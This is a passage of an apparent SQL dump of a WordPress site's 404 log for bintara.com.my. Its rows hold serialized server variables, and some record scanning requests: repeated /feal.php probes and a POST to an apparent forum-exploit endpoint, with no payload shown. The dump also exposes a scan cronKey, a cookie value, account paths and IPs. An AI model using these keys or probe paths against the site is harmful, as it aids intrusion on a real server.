METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:10:\"SCRIPT_URL\";s:9:\"/feal.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYt75vTT-ZZc8Zptu2C7ZQAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569422310.9169\";s:12:\"REQUEST_TIME\";s:10:\"1569422310\";}}','notice','2019-09-25 14:38:32','2019-09-25 14:38:31',30763184,32570440,'https://bintara.com.my/feal.php',1,0,'103.28.38.21'),(27003,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/feal.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/feal.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYt7-mE34CWnhBYozkDd3wAAANE\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/feal.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYt7-mE34CWnhBYozkDd3wAAANE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"39876\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:10:\"SCRIPT_URL\";s:9:\"/feal.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYt7-mE34CWnhBYozkDd3wAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569422334.8203\";s:12:\"REQUEST_TIME\";s:10:\"1569422334\";}}','notice','2019-09-25 14:38:57','2019-09-25 14:38:55',31156416,32963360,'https://bintara.com.my/feal.php',1,0,'103.28.38.21'),(27004,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/feal.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/feal.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYt8AfTT-ZZc8Zptu2C7ZwAAAQA\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/feal.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYt8AfTT-ZZc8Zptu2C7ZwAAAQA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"40264\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:10:\"SCRIPT_URL\";s:9:\"/feal.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYt8AfTT-ZZc8Zptu2C7ZwAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569422337.7598\";s:12:\"REQUEST_TIME\";s:10:\"1569422337\";}}','notice','2019-09-25 14:38:59','2019-09-25 14:38:58',30767472,32584528,'https://bintara.com.my/feal.php',1,0,'103.28.38.21'),(27005,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/ajax/render/widget_php\";s:14:\"CONTENT_LENGTH\";s:2:\"49\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:74:\"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/ajax/render/widget_php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/ajax/render/widget_php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYuDeWE34CWnhBYozkDffgAAAM8\";s:12:\"REDIRECT_URL\";s:23:\"/ajax/render/widget_php\";s:11:\"REMOTE_ADDR\";s:13:\"40.118.44.199\";s:11:\"REMOTE_PORT\";s:5:\"54717\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/ajax/render/widget_php\";s:10:\"SCRIPT_URL\";s:23:\"/ajax/render/widget_php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuDeWE34CWnhBYozkDffgAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569424249.38\";s:12:\"REQUEST_TIME\";s:10:\"1569424249\";}}','notice','2019-09-25 15:10:52','2019-09-25 15:10:49',31615424,33423768,'https://bintara.com.my/ajax/render/widget_php',1,0,'40.118.44.199'),(27006,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"45.77.46.179\";s:11:\"REMOTE_PORT\";s:5:\"49578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuFeenPWn3xMeVo-UZSOQAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569424761.8829\";s:12:\"REQUEST_TIME\";s:10:\"1569424761\";}}','notice','2019-09-25 15:19:23','2019-09-25 15:19:22',30817192,32637184,'https://bintara.com.my/?page_id=18',1,0,'45.77.46.179'),(27007,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:78:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=ea7798b1157936d4b0106e3476923eac\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:51:\"End of script output before headers: admin-ajax.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:91:\"action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=ea7798b1157936d4b0106e3476923eac\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"56314\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=ea7798b1157936d4b0106e3476923eac\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:64:\"/home/norfaiz/public_html/bintara.com.my/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:24:\"/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYuSnN1OETjqfsv3Bw6NEAAAAII\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYuSnN1OETjqfsv3Bw6NEAAAAII\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"56314\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuSnN1OETjqfsv3Bw6NEAAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569428127.546\";s:12:\"REQUEST_TIME\";s:10:\"1569428127\";}}','notice','2019-09-25 16:15:29','2019-09-25 16:15:27',30862528,31114712,'https://bintara.com.my/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=ea7798b1157936d4b0106e3476923eac',1,0,'103.6.198.69'),(27008,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d425655779afca49c488980680fa79ed\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"58154\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuXIGE34CWnhBYozkDjZQAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569429280.9982\";s:12:\"REQUEST_TIME\";s:10:\"1569429280\";}}','notice','2019-09-25 16:34:42','2019-09-25 16:34:41',30820864,32636296,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27009,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"60129\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuX12E34CWnhBYozkDjfAAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569429463.5259\";s:12:\"REQUEST_TIME\";s:10:\"1569429463\";}}','notice','2019-09-25 16:37:45','2019-09-25 16:37:43',30820064,32634728,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27010,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 